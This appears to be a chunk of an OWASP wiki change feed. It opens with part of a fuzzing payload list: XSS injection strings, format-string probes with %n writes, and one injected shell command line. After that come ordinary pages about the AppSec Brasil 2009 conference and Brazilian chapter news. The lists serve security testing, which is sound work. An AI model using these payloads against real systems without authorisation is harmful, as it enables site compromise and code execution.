&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Identification (Under work) ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
Reviwer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Fuzzing Code Database Project - GPC Tab}}&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009&amp;diff=60069</id>
		<title>AppSec Brasil 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009&amp;diff=60069"/>
				<updated>2009-05-04T18:43:13Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Conference Committee */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''Para a versão em português, veja em [[AppSec Brasil 2009 (pt-br)]]'''&lt;br /&gt;
&lt;br /&gt;
Welcome to the OWASP Application Security Brasil Conference! After successful OWASP Conferences in the United States and Europe, we are now in Brazil in October 2009! &lt;br /&gt;
&lt;br /&gt;
[[Image:Brasilia Panorama.jpg]]&lt;br /&gt;
&lt;br /&gt;
With support from [http://www.ticontrole.gov.br TI-Controle] and the Computing Centre of the [http://www.camara.gov.br Deputy Chamber], OWASP will hold in October the first Brazilian Application Security conference in [http://en.wikipedia.org/wiki/Brasília Brasilia, Capital of Brazil]. The Conference consists of two days of training sessions, followed by a two-day conference on a single track.&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
&lt;br /&gt;
'''Brasília, Brazil.'''&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations / Research Papers==&lt;br /&gt;
&lt;br /&gt;
To be defined&lt;br /&gt;
&lt;br /&gt;
==Call for Training Provider==&lt;br /&gt;
&lt;br /&gt;
To be defined&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations ==&lt;br /&gt;
&lt;br /&gt;
Please see the Portuguese version of this page at [[AppSec Brasil 2009 (pt-br)]]&lt;br /&gt;
&lt;br /&gt;
==Venue==&lt;br /&gt;
&lt;br /&gt;
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]]&lt;br /&gt;
&lt;br /&gt;
The event will be held in Brasília, Brazil's Capital at: Câmara dos Deputados, Anexo II, Praça dos Três Poderes.&lt;br /&gt;
&lt;br /&gt;
You can check the location at [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;q=anexo+II,+camara+dos+deputados,+brasilia&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=43.934478,79.101563&amp;amp;ie=UTF8&amp;amp;t=h&amp;amp;ll=-15.800058,-47.865822&amp;amp;spn=0.01309,0.019312&amp;amp;z=16 Google Maps]&lt;br /&gt;
&lt;br /&gt;
==Registration==&lt;br /&gt;
&lt;br /&gt;
Will be available soon.&lt;br /&gt;
&lt;br /&gt;
==Tutorial Days - October 27-28==&lt;br /&gt;
&lt;br /&gt;
OWASP will host numerous 1 and 2 day tutorial sessions prior to the conference. If you are interested in delivering a tutorial at this event, please contact [mailto:eduardo.neves@owasp.org Eduardo Neves].&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
To be defined&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
&lt;br /&gt;
To be defined&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
&lt;br /&gt;
To be defined&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
There will be no fees for this conference, only '''registration''' is required to participate.&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
2009 AppSec CPLP  Program Committee:&lt;br /&gt;
* Conference Chair: Lucas C. Ferreira (contato at sapao.net)&lt;br /&gt;
* Tutorials Organization: Eduardo V. C. Neves (eduardo.neves at owasp.org)&lt;br /&gt;
* Tracks Organization: Wagner Elias (wagner.elias at owasp.org)&lt;br /&gt;
&lt;br /&gt;
Pre-Event Organization Team&lt;br /&gt;
&lt;br /&gt;
* Cassio Goldschmidt (cassio 'at' owasp.org)&lt;br /&gt;
* Kuai Hinojosa (kuai.hinojosa 'at' owasp.org)&lt;br /&gt;
* Leonardo Cavallari - (email)&lt;br /&gt;
* Thiago Lechuga (thiagoalz 'at' gmail.com)&lt;br /&gt;
&lt;br /&gt;
Event Organization Team&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
This conference will be sponsored by the [http://www2.camara.gov.br/english Center for Information Technology of the Brazilian Deputy Chamber]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Brazilian&amp;diff=60051</id>
		<title>Brazilian</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Brazilian&amp;diff=60051"/>
				<updated>2009-05-04T16:47:22Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* AppSec Brazil 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Brazilian|extra=The chapter leader is [mailto:wagner.elias@gmail.com Wagner Elias] |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-brazilian|emailarchives=http://lists.owasp.org/pipermail/owasp-brazilian}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Brazil&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Novidades do Capítulo ==&lt;br /&gt;
&lt;br /&gt;
=== AppSec Brazil 2009 ===&lt;br /&gt;
&lt;br /&gt;
O Chapter Brazil do OWASP estará realizando o primeiro App Sec Brazil, este evento será apoiado pela Câmara de Deputados do Brasil. Saiba mais sobre o evento [http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)/ aqui].&lt;br /&gt;
&lt;br /&gt;
=== PHP Conference 2008 ===&lt;br /&gt;
&lt;br /&gt;
O Chapter Brazil do OWASP estará no evento PHP Conference Brasil 08, com expectativa de atingir cerca de 1.000 profissionais participantes e será realizado no UNIFIEO, Universidade localizada no Município de Osasco, São Paulo.&lt;br /&gt;
&lt;br /&gt;
O nosso Chapter Leader, Wagner Elias, irá apresentar a palestra “Tratando as vulnerabilidades do Top 10 da OWASP”, no dia 28/11 das 9h00 às 10h30 na sala AT2 - Amarelo. Além disso, ele irá representar o Chapter Brazil do OWASP na solenidade de abertura do evento, que irá ocorrer no dia 29/11. Saiba mais sobre o evento [http://phpconf.com.br/ aqui].&lt;br /&gt;
&lt;br /&gt;
=== OWASP EU Summit 2008 ===&lt;br /&gt;
&lt;br /&gt;
Caros,&lt;br /&gt;
 &lt;br /&gt;
O OWASP EU Summit 2008 será apresentado em Portugal entre os dias 3 e 7 de novembro de 2008, e como responsável pela formação da grade de treinamentos, gostaria de convidar os interessados em ministrar cursos de IT Security a entrarem em contato comigo para maiores detalhes.&lt;br /&gt;
 &lt;br /&gt;
Todos os cursos deverão ser apresentados em inglês, são remunerados e incluem a participação do instrutor nas demais seções do EU Summit. &lt;br /&gt;
 &lt;br /&gt;
Informações sobre o evento estão disponíveis em: https://www.owasp.org/index.php/OWASP_EU_Summit_2008.&lt;br /&gt;
 &lt;br /&gt;
Atenciosamente,&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''Eduardo Vianna de Camargo Neves, CISSP'''&lt;br /&gt;
&lt;br /&gt;
Conviso IT Security, Operations Manager&lt;br /&gt;
&lt;br /&gt;
T. 55 (41) 3075.3080 | M. 55 (41) 9941.0825&lt;br /&gt;
&lt;br /&gt;
eneves (at) conviso.com.br&lt;br /&gt;
&lt;br /&gt;
=== SoC 2008 - Projetos Aprovados ===&lt;br /&gt;
&lt;br /&gt;
Duas propostas submetidas por membros do capítulo foram aprovadas na temporada [[OWASP Summer of Code 2008]]. São elas:&lt;br /&gt;
&lt;br /&gt;
'''[[:Category:OWASP Positive Security Project|Positive Security Project]] - por Eduardo Camargo Neves''': modificar a perspectiva adotada pelas empresas ao se tratar de aplicações por uma abordagem positiva.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''[[OWASP ASDR Project]] -  por [mailto:leonardocavallari(at)gmail.com Leonardo Cavallari]''': visa criar o guia de referência mais completo sobre segurança em aplicações Web, incluindo [[ASDR TOC Principles|Princípios]],[[ASDR TOC Threat Agents|Agentes de ameaças]], [[ASDR TOC Vulnerabilities|Vulnerabilidades]], [[ASDR TOC Attacks|Ataques]], [[ASDR TOC Control|Controles]], [[ASDR TOC Technical Impacts|Impactos Técnicos]] e de [[ASDR TOC Business Impacts|Negócio]].&lt;br /&gt;
&lt;br /&gt;
Estamos precisando de voluntários! Entre em contato com os líderes dos projetos para saber como contribuir!!&lt;br /&gt;
&lt;br /&gt;
=== Tradução da ferramenta WebGoat ===&lt;br /&gt;
O [[OWASP WebGoat Project|WebGoat]], projeto mantido pela OWASP é uma aplicação J2EE elaborada com diversas falhas propositais para ser utilizada como ferramenta de apresendizado.&lt;br /&gt;
[http://softwareseguro.blogspot.com Fabrício Braz] realizou a tradução da ferramenta possibilitando melhor entendimento das lições oferecidas.&lt;br /&gt;
&lt;br /&gt;
Faça o download da versão em português [http://code.google.com/p/webgoat-ptbr/downloads/list aqui].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Tradução OWASP TOP10 ===&lt;br /&gt;
O Capítulo Brasil, por meio de seus voluntários, concluiu a tradução do OWASP TOP 10 2007, documento que reúne as 10 vulnerabilidades mais críticas em aplicações WEB. [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Acesse o documento] e já comece a validar suas aplicações!&lt;br /&gt;
&lt;br /&gt;
Agradeço o comprometimento de todos envolvidos no projeto: [mailto:clebber@gmail.com Cleber Brandão “Clebeer”], [mailto:fabricio.braz@gmail.com Fabricio Ataides Braz], [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues], [mailto:mykesh@gmail.com Myke Hamada], [mailto:spooker@gmail.com Rodrigo Montoro “Sp0oKer”].&lt;br /&gt;
&lt;br /&gt;
[mailto:leonardocavallari@gmail.com Leonardo Cavallari] - Organizador e Responsável pela tradução&lt;br /&gt;
&lt;br /&gt;
== Eventos ==&lt;br /&gt;
=== Apresentação sobre o OWASP e projeto TOP 10 @ ISSA Day - Capítulo Brasil/SP ===&lt;br /&gt;
Introdução sobre o projeto OWASP e TOP10 apresentado aos participantes do ISSA Day/Brasil em Junho/2008, por Leonardo Cavallari.&lt;br /&gt;
&lt;br /&gt;
Download das apresentações pode ser feito nos links abaixo:&lt;br /&gt;
&lt;br /&gt;
Parte I - [http://www.owasp.org/images/b/b4/OWASP-Intro-2008-pt-br.ppt Introdução OWASP]&lt;br /&gt;
&lt;br /&gt;
Parte II - TOP10 2007 [http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt Apresentação] - [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Documento]&lt;br /&gt;
&lt;br /&gt;
=== OWASP TOP 10 @ FATEC Sorocaba ===&lt;br /&gt;
No dia 07 de abril às 19:30, Gislaine Lirian Bueno irá apresentar o TOP 10 2007 na FATEC de Sorocaba para os estudantes do curso de Processamento de Dados. A apresentação é aberta ao público, portanto quem estiver pela região ou morar próximo poderá assistir ao evento.&lt;br /&gt;
&lt;br /&gt;
Maiores informações: [http://www.fatecsorocaba.edu.br/contato/contato.asp FATEC Sorocaba]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== OWASP TOP 10 @ FISL ===&lt;br /&gt;
O capítulo Brasil irá fazer uma apresentação no 9º Fórum Internacional de Software Livre - FISL - a ser realizado entre os dias 17 e 19 de abril de 2008. Nesta ocasião o TOP 10 2007, será apresentado pelos membros [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues] e [mailto:leonardocavallari@gmail.com Leonardo Cavallari].&lt;br /&gt;
&lt;br /&gt;
As inscrições para o FISL podem ser realizadas no [http://fisl.softwarelivre.org/ site].&lt;br /&gt;
Grade do evento pode ser acessada em [http://fisl.softwarelivre.org/9.0/papers/pub/ http://fisl.softwarelivre.org/9.0/papers/pub/].&lt;br /&gt;
&lt;br /&gt;
== Atividades ==&lt;br /&gt;
Estamos recrutando voluntários para participarem das seguintes atividades:&lt;br /&gt;
* Tradução de documentos&lt;br /&gt;
* Apresentação de palestras&lt;br /&gt;
Aos interessados em apresentar palestras ou que possam abrir espaço para alguém apresentar, preencha a tabela abaixo procurando manter os registros de acordo com as datas dos eventos:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Facilitador&lt;br /&gt;
! Apresentador&lt;br /&gt;
! Assunto&lt;br /&gt;
! Data&lt;br /&gt;
! Local&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:thiagoalz@gmail.com Thiago Lechuga]&lt;br /&gt;
| [mailto:thiagoalz@gmail.com Thiago Lechuga]&lt;br /&gt;
| OWASP TOP 10&lt;br /&gt;
| Definir&lt;br /&gt;
| UNICAMP&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:janotijr@yahoo.com.br Paulo Janoti]&lt;br /&gt;
| [Definir]&lt;br /&gt;
| OWASP TOP 10&lt;br /&gt;
| Definir (Maio)&lt;br /&gt;
| ISTCC-RJ- FAETEC&lt;br /&gt;
|-&lt;br /&gt;
| [mailto:gugdias@gmail.com Gustavo Dias]&lt;br /&gt;
| Definir&lt;br /&gt;
| OWASP TOP 10/*&lt;br /&gt;
| Definir&lt;br /&gt;
| UFSCAR&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Desenvolvimento de artigos para revistas e mídias de comunicação&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Brazilian&amp;diff=60050</id>
		<title>Brazilian</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Brazilian&amp;diff=60050"/>
				<updated>2009-05-04T16:46:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* PHP Conference 2008 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Brazilian|extra=The chapter leader is [mailto:wagner.elias@gmail.com Wagner Elias] |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-brazilian|emailarchives=http://lists.owasp.org/pipermail/owasp-brazilian}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Brazil&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Novidades do Capítulo ==&lt;br /&gt;
&lt;br /&gt;
=== AppSec Brazil 2009 ===&lt;br /&gt;
&lt;br /&gt;
O Chapter Brazil do OWASP estará realizando o primeiro App Sec Brazil, este evento será apoiado pela Câmara de Deputados do Brasil e tem como seu principal líder e organizador Lucas Ferreira. Saiba mais sobre o evento [http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)/ aqui].&lt;br /&gt;
&lt;br /&gt;
=== PHP Conference 2008 ===&lt;br /&gt;
&lt;br /&gt;
O Chapter Brazil do OWASP estará no evento PHP Conference Brasil 08, com expectativa de atingir cerca de 1.000 profissionais participantes e será realizado no UNIFIEO, Universidade localizada no Município de Osasco, São Paulo.&lt;br /&gt;
&lt;br /&gt;
O nosso Chapter Leader, Wagner Elias, irá apresentar a palestra “Tratando as vulnerabilidades do Top 10 da OWASP”, no dia 28/11 das 9h00 às 10h30 na sala AT2 - Amarelo. Além disso, ele irá representar o Chapter Brazil do OWASP na solenidade de abertura do evento, que irá ocorrer no dia 29/11. Saiba mais sobre o evento [http://phpconf.com.br/ aqui].&lt;br /&gt;
&lt;br /&gt;
=== OWASP EU Summit 2008 ===&lt;br /&gt;
&lt;br /&gt;
Caros,&lt;br /&gt;
 &lt;br /&gt;
O OWASP EU Summit 2008 será apresentado em Portugal entre os dias 3 e 7 de novembro de 2008, e como responsável pela formação da grade de treinamentos, gostaria de convidar os interessados em ministrar cursos de IT Security a entrarem em contato comigo para maiores detalhes.&lt;br /&gt;
 &lt;br /&gt;
Todos os cursos deverão ser apresentados em inglês, são remunerados e incluem a participação do instrutor nas demais seções do EU Summit. &lt;br /&gt;
 &lt;br /&gt;
Informações sobre o evento estão disponíveis em: https://www.owasp.org/index.php/OWASP_EU_Summit_2008.&lt;br /&gt;
 &lt;br /&gt;
Atenciosamente,&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''Eduardo Vianna de Camargo Neves, CISSP'''&lt;br /&gt;
&lt;br /&gt;
Conviso IT Security, Operations Manager&lt;br /&gt;
&lt;br /&gt;
T. 55 (41) 3075.3080 | M. 55 (41) 9941.0825&lt;br /&gt;
&lt;br /&gt;
eneves (at) conviso.com.br&lt;br /&gt;
&lt;br /&gt;
=== SoC 2008 - Projetos Aprovados ===&lt;br /&gt;
&lt;br /&gt;
Duas propostas submetidas por membros do capítulo foram aprovadas na temporada [[OWASP Summer of Code 2008]]. São elas:&lt;br /&gt;
&lt;br /&gt;
'''[[:Category:OWASP Positive Security Project|Positive Security Project]] - por Eduardo Camargo Neves''': modificar a perspectiva adotada pelas empresas ao se tratar de aplicações por uma abordagem positiva.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''[[OWASP ASDR Project]] -  por [mailto:leonardocavallari(at)gmail.com Leonardo Cavallari]''': visa criar o guia de referência mais completo sobre segurança em aplicações Web, incluindo [[ASDR TOC Principles|Princípios]],[[ASDR TOC Threat Agents|Agentes de ameaças]], [[ASDR TOC Vulnerabilities|Vulnerabilidades]], [[ASDR TOC Attacks|Ataques]], [[ASDR TOC Control|Controles]], [[ASDR TOC Technical Impacts|Impactos Técnicos]] e de [[ASDR TOC Business Impacts|Negócio]].&lt;br /&gt;
&lt;br /&gt;
Estamos precisando de voluntários! Entre em contato com os líderes dos projetos para saber como contribuir!!&lt;br /&gt;
&lt;br /&gt;
=== Tradução da ferramenta WebGoat ===&lt;br /&gt;
O [[OWASP WebGoat Project|WebGoat]], projeto mantido pela OWASP é uma aplicação J2EE elaborada com diversas falhas propositais para ser utilizada como ferramenta de apresendizado.&lt;br /&gt;
[http://softwareseguro.blogspot.com Fabrício Braz] realizou a tradução da ferramenta possibilitando melhor entendimento das lições oferecidas.&lt;br /&gt;
&lt;br /&gt;
Faça o download da versão em português [http://code.google.com/p/webgoat-ptbr/downloads/list aqui].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Tradução OWASP TOP10 ===&lt;br /&gt;
O Capítulo Brasil, por meio de seus voluntários, concluiu a tradução do OWASP TOP 10 2007, documento que reúne as 10 vulnerabilidades mais críticas em aplicações WEB. [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Acesse o documento] e já comece a validar suas aplicações!&lt;br /&gt;
&lt;br /&gt;
Agradeço o comprometimento de todos envolvidos no projeto: [mailto:clebber@gmail.com Cleber Brandão “Clebeer”], [mailto:fabricio.braz@gmail.com Fabricio Ataides Braz], [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues], [mailto:mykesh@gmail.com Myke Hamada], [mailto:spooker@gmail.com Rodrigo Montoro “Sp0oKer”].&lt;br /&gt;
&lt;br /&gt;
[mailto:leonardocavallari@gmail.com Leonardo Cavallari] - Organizador e Responsável pela tradução&lt;br /&gt;
&lt;br /&gt;
== Eventos ==&lt;br /&gt;
=== Apresentação sobre o OWASP e projeto TOP 10 @ ISSA Day - Capítulo Brasil/SP ===&lt;br /&gt;
